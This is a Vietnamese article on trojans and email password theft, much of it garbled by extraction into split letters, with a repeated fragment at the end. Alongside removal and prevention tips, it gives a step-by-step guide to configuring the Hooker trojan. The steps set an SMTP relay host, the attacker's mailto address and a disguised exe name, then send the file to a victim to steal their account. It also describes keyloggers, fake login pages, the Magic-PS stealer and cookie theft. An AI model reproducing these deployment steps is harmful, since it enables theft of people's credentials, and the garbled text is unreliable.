n nay , l c l ng các hacker ang phát tri n t ng ng y còn các cracker thì phát tri n ự ượ đ ể ừ à ể v i m t t c không th t ng t ng n i . Không th t n t i m t h th ng n o trên ớ ộ ố độ ể ưở ượ ổ ể ồ ạ ộ ệ ố à th gi i l không th b t n công . M t máy tính cá nhân l m t m c tiêu r t n ế ớ à ể ị ấ ộ à ộ ụ ấ đơ gi n m 1 cracker v i không nhi u hi u bi t v máy tính c ng có th t n công , vì ả à ớ ề ể ế ề ũ ể ấ v y ó c ng l lí do t i sao cracker phát tri n manh m n nh v y . Các hacker có ậ đ ũ à ạ ể ẽ đế ư ậ kh n ng vi t ra các trojan v t th nghi m còn các cracker có kh n ng s d ng ả ă ế à ự ử ệ ả ă ử ụ trojan m t cách hi u qu , k n ng c a h h n n n nhân chính l kh n ng s d ngộ ệ ả ĩ ă ủ ọ ơ ạ à ở ả ă ử ụ trojan . Ng a trojan ra i trong truy n thuy t Hy L p c i v o th k th 12, khi quân Hy ự đờ ề ế ạ ổ đạ à ế ỉ ứ l p không th h n i th nh ch , h ã gi v t ng quân ch m t chú ng a g ạ ể ạ ổ à đị ọ đ ả ờ ặ đị ộ ự ỗ kh ng l . Sau khi chú ng a g ã c em v o th nh , n a êm quân Hy L p trongổ ồ ự ỗ đ đượ đ à à ử đ ạ b ng chú ng a g chui ra v t n công tiêu di t quân ch m t cách b t ng , nh m uụ ự ỗ à ấ ệ đị ộ ấ ờ ờ ư n y m h ã h c th nh gi c . à à ọ đ ạ đượ à ặ Trong th gi i tin h c , khái ni m Ng a trojan ra i t khi CDC(Cult of the Dead ế ớ ọ ệ ự đờ ừ Cow) t o ra Back Orifice , m t trojan n i ti ng nh t t tr c n sau n y , có c ng ạ ộ ổ ế ấ ừ ướ đế à ổ xâm nh p l 31337ậ à . I/. Trojan là gì và hoạt động nhu thế nào ? Trojan có nhiều loại nhưng vẫn chủ yếu là 2 loại chính : 1.Trojan lấy pass rồi gửi cho ta pass đã lấy được qua email chẳng hạn nhu hooker, barok . 2.Trojan dùng để điều khiển nhu SUB7, DUA TI CHOI . Loại thứ 1: Trojan lấy pass rồi gửi cho ta pass đã lấy đuộc qua email . *** Có nghĩa là sao??: Khi bạn gởi con trojan này cho nạn nhân (bạn bè ,kẻ thù ,người lạ ).và nếu như người đó kích hoạt trojan (có nghia là chạy nó) thì trojan sẽ bắt đầu hoạt động. *** Nó hoạt động như thế nào: A.Trước tiên nó sẽ bắt đầu tự động sao chép nó vào 1 nơi nào đó trên ổ cứng (thông thường là thư mục C:\Windows hoặc C:\Windows \System) tại vì những nơi đó thường chứa rất nhiều file l? và có lẽ bạn chưa bao giờ biết đến nhưng lai không bao giờ động đến nó như delete(xoá) hoăc rename(đổi tên)bởi vì bạn luôn cho rằng nó chính là file hệ thống và bạn chẳng bao giờ nhận biết đuợc nó có phải la file lạ hay không. B.Sau khi tìm đuợc chỗ ẩn mình nó sẽ bắt đầu ghi vào registry của bạn các thông số để nó có thể tự động chạy mỗi lần khởi động máy và thông thường là nó vào khoá sau.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServices Muốn biết rõ hơn bạn làm như sau : Chọn start _chọn run_Sau đó gõ vào ô vừa xuất hiện dòng chữ regedit nó sẽ mở ra 1 khung chương trình mới đó chính là cửa sổ registry.Bạn chọn HKEY_LOCAL_MACHINE sau đó chọn tiếp SOFTWARE Rồi chọn tiếp Microsoft ,tiếp tục là chọn Windows ,chọn CurrentVersion,chọn Run Okie.Tới đây ,bạn nhìn sang phía bên phải sẽ thấy 1 danh sách các chương tình đang được tự động chạy khi khởi động máy. Nếu tinh ý bạn sẽ thấy 1 tên rất lạ mà bạn chưa bao giờ nhìn thấy trong các chương trình mình đã cài trên máy mình :chẳng hạn như sub7,hay .twain .và bên cạnh nó là đường dãn đến file chương trình của nó . - Hooker có thể đăng nhập keypresses trong cửa sổ mọi hoặc chỉ trong cửa sổ đã được xác định trước xâu trong đó tiêu đề (ví dụ, 'đăng nhập', 'passw', 'hạn' vv). - Hooker có thể đăng nhập bao gồm tất cả các phím Shift, ALT, TAB, CTRL, Caps Lock, vv hoặc đăng nhập văn bản chỉ-phím (chars vv). Đây chính là nguồn gốc của vấn đề và nếu bạn xoá nó đi thì đuong nhiên ván đề sẽ được giải quyết.Bạn nhấp chuột phải vào cái tên lạ đấy rồi chọn delete.Okie.Trojan đã không thể tự động chạy mỗi khi khởi động máy nữa.Sau đó bạn khởi động máy lại và tìm đến đường dẫn của nó để xoá file exe của nó.Nên nhớ là phải khởi động lại máy ,bạn mới có thể xoá đựoc nó bởi vì nếu không ,nó sẽ không thể bị xoá vì nó vẫn đang ở cơ chế hoạt động.Xem hình minh hoạ C.Vừa rồi chúng ta đã tìm hiểu nguyên nhân vì sao nó tự động chạy mỗi khi khởi động máy.bây giờ chúng ta sẽ nghiên cứu nó sẽ gửi thông tin trên máy và password đến chủ nhân của nó nhu thế nào . Một số trojan nó sẽ lấy tất cả password cuả bạn lưu xuống máy như password khi connect Tất cả password khi bạn lưu này sẽ được ghi vào các tập tin *.pwl.Trojan giải mã nó rồi tự động gửi mail đến chủ nhân của nó với nội dung thu sẽ là user và password của bạn như vậy bạn đã bị lộ password.Một số khác còn có thể có thêm tính năng keylog ,tính năng này sẽ giúp nó ghi nhận đuợc tất cả những gì bạn gõ xuống máy và như thể không những lấy đuợc pass mà còn có thẻ lấy được số thẻ tín dụng và tất cả các thông tin vè bạn .Tất cả các thông tin đó sẽ dược lưu vào tập tin nào đó trên máy.Sau đó nó sẽ gởi tất cả những thông tin này đến cho chủ nhân qua email khi bạn nối mạng Hooker là gì? Hooker là Trojan gửi thư đơn giản. Sau đây là danh sách các tính năng của nó: - Keylog chức năng (khá đơn giản, không nên mở rộng như trong HookDump) - Bạn có thể định nghĩa tùy chọn nào bạn có thể tưởng tượng - đó là tấn của họ - Hooker có thể tìm RAS-kết nối - Hooker có thể tải tập tin từ bất kỳ điểm nào trên internet và bắt đầu họ hoàn toàn vô hình từ người dùng - Bạn có thể sử dụng mai dâm như intruding module để bắt đầu các trojans lớn như NetBus hoặc BO - Tác phẩm dưới bất kỳ nền tảng Win32 (Win95/98/NT) - Bài nhận xét nguồn có sẵn cho Việt - bạn có thể xây dựng phiên bản của bạn rất riêng của mai dâm;) - Làm thế nào để sử dụng nó: Như tôi đã nói từ đầu là trojan có rất nhiều loại . Tôi xin giới thiệu cách sử dụng 1 loại trojan đon giản và thông dụng là HOOKER Bước 1 : bạn download trojan Hooker về rồi giải nén ; Nó sẽ gồm các file sau : Config.bat ; history.txt ; hkconf.exe ; hooker.exe ; Hkconf.ini ; Buớc 2 : Bạn chạy file Hkconf.ini đây chính là file cần thiết để trojan có thể nhận biết được nó sẽ gửi email về địa chỉ nào thông qua host nào, bạn thay dổi các thông số của file này như sau : host = hcm-mail-prepaid.vnn.vn(chú thích:Đây chính là địa chỉ SMTP ,thông qua host này ,trojan mới có thể gửi mail về cho bạn được ).Bạn có thể tìm các host này trên trang http://www.vnlogic.net/smtp.htm .Nhưng vấn đề là các host rất có thể lúc này sẽ hoạt động được nhưng 1 thời gian sau nó sẽ ngưng hoạt động hoặc hạn chế hoạt động vì thế anh em phải thương xuyên cập nhật và cũng đừng lấy làm lạ khi 1 ngày nào đó trojan không thể gửi email về cho mình Tôi thường dùng cái host này :hcm-mail-prepaid.vnn.vn vì nó nhanh và ổn định,đến nay thì nó vẫn hoạt động. mailto=dịa chỉ email của bạn ( bạn điền vào đây địa chỉ email của bạn để trojan gửi email về cho bạn) reg_desc = TaskMem exename = MSCR56.exe ở dòng cuối cùng của file này bạn thêm một dòng sau s13=logon Buớc 3 : Sau khi thay dổi xong bạn save lại ! rồi chạy file Config.bat !!! Buớc 4: Sau khi thực hiện xong 3 buớc trên bạn gửi file Hooker.exe cho kẻ cần lấy cắp ! Buớc 5 : Bạn chỉ việc ngồi chờ sao cho victim mở file của bạn gửi ! Thế là acc đã thuộc về bạn. Cách phòng ch ng Key kogger Trojan v ph ng th c l y –ố à ươ ứ ấ tr m tinộ Các th thu t phòng ch ng Key logger - Trojanủ ậ ố C n th n v i password c a emailẩ ậ ớ ủ Hi n nay, nhu c u s d ng email t ng r t nhanh. Trong s các d ch v th ệ ầ ử ụ ă ấ ố ị ụ ư i n t trên m ng, ti n d ng nh t v n chính l Yahoo! Mail. Yahoo hi n đ ệ ử ạ ệ ụ ấ ẫ à ệ l nh cung c p mail m nh nh t, b n c s d ng 4Mb hay 6Mb cho h pà à ấ ạ ấ ạ đượ ử ụ ộ th , có th dùng thêm d ch v chat (text, hình, ti ng), không nh ng th còn ư ể ị ụ ế ữ ế có th chia s t p tin v s d ng nhi u ti n ích khác n a.ể ẻ ệ à ử ụ ề ệ ữ B n có th m t h p th yêu d u c a mình ch trong m t phút l nh. ạ ể ấ ộ ư ấ ủ ỉ ộ ơ đễ Không ph i ch d ch v truy nh p Internet công c ng m s nguy hi m ả ỉ ở ị ụ ậ ộ à ự ể còn rình r p b n b t c n i âu. Sau ây l m t v i cách m các b n có ậ ạ ấ ứ ơ đ đ à ộ à à ạ th m t password h p th c a mình:ể ấ ộ ư ủ Cách 1: S d ng Key loggerử ụ M c th nh công: h u nh l 99 %ứ độ à ầ ư à N u nh n hay g i th các i m truy nh p Internet công c ng thì b n r t ế ậ ử ư ở đ ể ậ ộ ạ ấ có th b m t password m th ph m l các key logger (ch ng trình ghi ể ị ấ à ủ ạ à ươ lén gõ phím). Key logger hi n nay r t hi n i, không nh các key logger ệ ấ ệ đạ ư “th i ti n s ”. Không c n c i t trên máy, có kích th c r t “khiêm ờ ề ử ầ à đặ ướ ấ t n”, nh ng các key logger n y l i l nh ng k l y c p password thi n ố ư à ạ à ữ ẻ ấ ắ ệ ngh , r i g i password l y c p t i m t a ch ã nh tr c (có key ệ ồ ử ấ ắ ớ ộ đị ỉ đ đị ướ logger ch ghi l i password v user name dùng c a yahoo messenger v g i ỉ ạ à ủ à ử email n ch nhân c a nó c nh báo). Do các key logger có th r t d đế ủ ủ để ả ể ấ ễ d ng tích h p v o v o 1 t p tin b t kì trên máy tính nên r t có th khi à ợ à à ệ ấ ấ ể b n ch y 1 trò ch i hay 1 ch ng trình n o ó thì b n ã b nhi m ph i ạ ạ ơ ươ à đ ạ đ ị ễ ả nó r i.ồ Công c th c hi nụ ự ệ M t ph n m m key logger hay ph n m m gián i p.ộ ầ ề ầ ề đ ệ Cách phòng ch ngố Có th s d ng ph n m m phòng ch ng key logger ho c s d ng ph n ể ử ụ ầ ề ố ặ ử ụ ầ m m Norton anti virus (nên c p nh t phiên b n m i nh t) phát hi n ề ậ ậ ả ớ ấ để ệ trojan d ng key logger n m trong 1 t p tin n o ó. B n có th dùng ch ngạ ằ ệ à đ ạ ể ươ trình phát hi n key logger nh : anti keylog, keylogg kill (b n ch c n truy ệ ư ạ ỉ ầ nh p v o ậ à http://www.google.com sau ó gõ v o tên c a ch ng trình -> đ à ủ ươ kích Search tìm ki m, ho c v o để ế ặ à http://download.com.com v gõ v o tênà à ch ng trình t i v dùng.ươ để ả ề n gi n nh t l khi m trang ng nh p b n hãy khoan ng nh p m Đơ ả ấ à ở đă ậ ạ đă ậ à tr c tiên hãy m m t ch ng trình so n th o b t kì (notepad ch ng h n),ướ ở ộ ươ ạ ả ấ ẳ ạ gõ m t chu i ký t b t kì kí t v o -> sau ó gõ tên ng i dùng & m t ộ ỗ ự ấ ự à đ ườ ậ kh u c a mình v o -> ti p t c gõ v o chu i kì t b t k -> sau ó sao ẩ ủ à ế ụ à ỗ ự ấ ỳ đ chép user name & password c a mình sang trang mail yahoo v dán user ủ à name v password v o. Khi dùng bi n pháp n y thì keylog ch ghi l i cà à ệ à ỉ ạ đượ o n v n b n có ch a c các chu i ký t ng u nhiên b n ã gõ v o (d đ ạ ă ả ứ ả ỗ ự ẫ ạ đ à ĩ nhiên l nó s không bi t âu l password th t) v cú gõ phím CTRL + V à ẽ ế đ à ậ à v o tr ng user name v password trong trang ng nh p Yahoo Mail.à ườ à đă ậ Cách 2: Dùng trang login giả M c th nh công: 45 %ứ độ à M IE ra, b n s th y trang ch Yahoo Mail hi n ra v lúc n y b n ch ở ạ ẽ ấ ủ ệ à à ạ ỉ bi t gõ user name v password. Sau khi gõ xong b n kích sign in nh ng v n ế à ạ ư ẫ không ng nh p c. B n âu có ng r ng trên thanh Address lúc n y đă ậ đượ ạ đ ờ ằ à không ph i l a ch ả à đị ỉ http://mail.yahoo.com (m c d u giao di n y h t giao ặ ầ ệ ệ di n th t c a Yahoo Mail). Th t s ây ch l m t ng d n n m t ệ ậ ủ ậ ự đ ỉ à ộ đườ ẫ đế ộ t p tin HTML c thi t k s n t trên máy tính b n ang truy nh p.ệ đượ ế ế ẵ đặ ạ đ ậ Công c th c hi nụ ự ệ chiêu n y, k n c p password không s d ng ph n m m, không òi h i Ở à ẻ ă ắ ử ụ ầ ề đ ỏ ph i bi t nhi u v l p trình web. Các tin t c có th s d ng o n code ả ế ề ề ậ ặ ể ử ụ đ ạ send mail (có th vi t b ng PHP, ASP, CGI ) ho c dùng các code form …ể ế ằ ặ mail có s n g i password thu th p c qua e-mail. ( ây xin c ẵ để ử ậ đượ ở đ đượ gi u ph ng pháp th c hi n vì m c tiêu c a b i vi t l h ng d n cách ấ ươ ự ệ ụ ủ à ế à ướ ẫ phòng ch ng).ố Cách phòng ch ngố Không nên gõ user name v password t m t c a s IE có s n, ho c ki m à ừ ộ ử ổ ẵ ặ ể tra mail t m t ng link b t kì (không ch riêng yahoo mail).ừ ộ đườ ấ ỉ Cách 3: L y password qua ch ng trình chat yahoo messengerấ ươ M c th nh công: 85 %ứ độ à Yahoo Messenger l ch ng trình chat thú v nh t v ph bi n nh t Vi tà ươ ị ấ à ổ ế ấ ở ệ Nam. Ch c n b n ng i chat v i m t tin t c m o danh l b n ã có th b ỉ ầ ạ ồ ớ ộ ặ ạ à ạ đ ể ị m t password. B n ng ngh ng i ta s h i tên ng i yêu hay s i n ấ ạ đừ ĩ ườ ẽ ỏ ườ ố đ ệ tho i, ng y sinh c a b n v c n c v o ó oán ra password. H ch ạ à ủ ạ à ă ứ à đ để đ ọ ỉ c n g i cho b n 1 t p tin game nho nh hay m t b c hình v b n m ra ầ ử ạ ệ ỏ ộ ứ à ạ ở xem (ngay c tôi c ng th không riêng gì b n) thì ch c ch n password c a ả ũ ế ạ ắ ắ ủ b n s b g i qua nick chat c a h vì t p tin h g i cho b n có ch a m t ạ ẽ ị ử ủ ọ ệ ọ ử ạ ứ ộ con Trojan n n p bên trong m b n không h bi t.ẩ ấ à ạ ề ế Công c th c hi nụ ự ệ M t ch ng trình c n con có tên l Magic – PS ộ ươ ỏ à Sau khi b n b c i b y, Yahoo ID v password c a b n s c g i cho ạ ị à ẫ à ủ ạ ẽ đượ ử nick ã c u hình s n. Ví d : Nick_cua_ban: This ID Hacked by: Magic-PS đ ấ ẵ ụ v1.41 ===> USER=nick_cua_ban PASS=password_cua_ban Cách phòng ch ngố - Không nh n t p tin t b t kì m t ng i l n o. N u ã trót nh n t p tin,ậ ệ ừ ấ ộ ườ ạ à ế đ ậ ệ b n hãy dùng ch ng trình quét virus nó tr c khi s d ng.ạ ươ ướ ử ụ - Th ng xuyên c p nh t các phiên b n yahoo messenger m i nh t.ườ ậ ậ ả ớ ấ L u ýư không ch v i d ng t p tin hình, m còn có th l t p tin screen ỉ ớ ạ ệ à ể à ệ saver (b o v m n hình) hay 1 t p tin .exe, .com, .bat, .pif u có th …ả ệ à ệ đề ể c các tin t c dùng c i trojan.đượ ặ để à Cách 4: L y password qua cookieấ M c th nh công: 30 %ứ độ à Sau khi b n ng nh p, website s t ng l u thông tin v o cookie (d ng ạ đă ậ ẽ ự độ ư à ạ t p tin text trên c ng c a b n) b n có th t ng ng nh p l n ệ ổ ứ ủ ạ để ạ ể ự độ đă ậ ầ sau. Công c th c hi n:ụ ự ệ Ch ng trình d ch t p tin cookie. Tin t c s sao chép t p tin cookie trên ươ ị ệ ặ ẽ ệ máy c a b n v dùng ch ng trình d ch ng c l i nh m ch n l c các ủ ạ à ươ để ị ượ ạ ằ ọ ọ thông tin c n thi t.ầ ế Cách phòng ch ngố - Không nên ánh d u v o tr c dòng ch Remember my ID on this đ ấ à ướ ữ computer không l u d u tích c a b n trong Cookie.để ư ấ ủ ạ - Khi r i kh i máy tính nên xoá Cookie i b ng cách: M IE, kích chu t ờ ỏ đ ằ ở ộ v o Tools, Internet Options, Gerneral, Delete Cookie. V cu i cùng, b n à à ố ạ kích chu t v o OKộ à Cách 5: Dùng trojan M c th nh công: 90 %ứ độ à Sau khi b n m web ra, 1 t p tin s t ng ch y m b n không h hay ạ ở ệ ẽ ự độ ạ à ạ ề bi t. Th l b n ã b nhi m trojan r i. Trojan n y s ghi nh n l i to n bế ế à ạ đ ị ễ ồ à ẽ ậ ạ à ộ nh ng gì m b n gõ lên b n phím -> r i g i cho ch nhân c a nó (gi ng ữ à ạ à ồ ử ủ ủ ố nh key logger) (m c th nh công lên n 90% , còn 10% l b n có m ư ứ độ à đế à ạ ở web hay không thôi!) Công c th c hi nụ ự ệ R t n gi n: tin t c ch c n g i cho b n 1 a ch web. Khi kích chu t ấ đơ ả ặ ỉ ầ ử ạ đị ỉ ộ v o b n th y trang web n y p quá. V y m b n ã b dính trojan m à ạ ấ à đẹ ậ à ạ đ ị à không hay r i y.ồ đấ Cái n y l d a v o l i c a IE. Nó ho t ng nh sau: Khi b n m m t à à ự à ỗ ủ ạ độ ư ạ ở ộ website, s có o n code nhúng v o web, o n code ó s t ng chèn ẽ đ ạ à đ ạ đ ẽ ự độ v o t p tin Notepad.exe. Sau ó n u b n m Notepad.exe ra th c thi thì à ệ đ ế ạ ở để ự ch c ch n b n ã tr th nh n n nhân r i.ắ ắ ạ đ ở à ạ ồ Cách phòng ch ngố - V o website à http://microsoft.com tìm b n service pack (b n s a l i) để ả ả ữ ỗ m i nh t r i c p nh t l i.ớ ấ ồ ậ ậ ạ - Không nên m trang web l .ở ạ D i ây l m t s l i khuyên tránh b k x u l i d ng l y ướ đ à ộ ố ờ để ị ẻ ấ ợ ụ để ấ password c a b n:ủ ạ - Không m t p tin ính kèm c a nh ng e-mail m ng i g i b n không ở ệ đ ủ ữ à ườ ử ạ bi tế - V i OE 6, b n có th ch nh trong Tools/Options/Security ch ng trình ớ ạ ể ỉ để ươ n y không cho phép m ho c l u nh ng t p tin ính kèm kh nghi.à ở ặ ư ữ ệ đ ả - Outlook v Outlook Express h tr HTML E-Mails. E-Mail ki u n y v a à ỗ ợ ể à ừ p v a sinh ng nh ng c ng r t nguy hi m n u b n không bi t cách đẹ ừ độ ư ũ ấ ể ế ạ ế phòng. HTML E-Mails có th ch a nh ng o n mã ki u Script hay ActiveX ể ứ ữ đ ạ ể có th nh p v o v phá ho i h th ng c a b n. tránh nh ng hi m h a ể ậ à à ạ ệ ố ủ ạ Để ữ ể ọ có th x y ra, b n nên th ng xuyên c p nh t ch ng trình E-Mail, nên ể ả ạ ườ ậ ậ ươ ch nh Security Zone trong m c Tools/Options/Security c a IE th nh ỉ ụ ủ à Restricted Sites Zone. Ngo i ra có th lo i b tính n ng ActiveX, Java trongà ể ạ ỏ ă Internet Explorer - D ng t p tin txt có khi s b i th nh TXT.EXE. Ví d , m t virus mang ạ ệ ẽ ị đổ à ụ ộ tên happy99.exe có th c i tên th nh happy99.txt.exe l a ng i ể đượ đổ à để ừ ườ nh n, nh t l khi nh ng ph n m r ng quen thu c trong tên t p tin c ậ ấ à ữ ầ ở ộ ộ ệ đượ Windows gi u i. Khi ó, b n ch th y m t t p tin mang tên happy99.txt vấ đ đ ạ ỉ ấ ộ ệ à ngh r ng t p tin TXT n y ch ng có gì nguy hi m.ĩ ằ ệ à ẳ ể - Tr c khi m các t p tin ính kèm, hãy ki m tra b ng m t ph n m m ướ ở ệ đ ể ằ ộ ầ ề Antivirus. Ph n m m n y ph i c c p nh t th ng xuyên.ầ ề à ả đượ ậ ậ ườ - Ngo i các t p tin hình nh JPG, BMP, GIF hay v n b n nh TXT, t t c à ệ ư ă ả ư ấ ả các t p tin i kèm theo email u có kh n ng nhi m virus. c bi t áng ệ đ đề ả ă ễ Đặ ệ đ chú ý l các t p tin có uôi PIF, EXE, COM, SCR, VBS.à ệ đ Chúc các b n th nh công v ng b m t password…ạ à à đừ ị ấ . hacker ang ph t tri n t ng ng y còn các cracker thì ph t tri n ự ượ đ ể ừ à ể v i m t t c không th t ng t ng n i . Không th t n t i m t h th ng n o trên ớ ộ. có thẻ lấy được số thẻ t n dụng và t t cả các thông tin vè bạn .T t cả các thông tin đó sẽ dược lưu vào t p tin nào đó trên máy.Sau đó nó sẽ gởi t t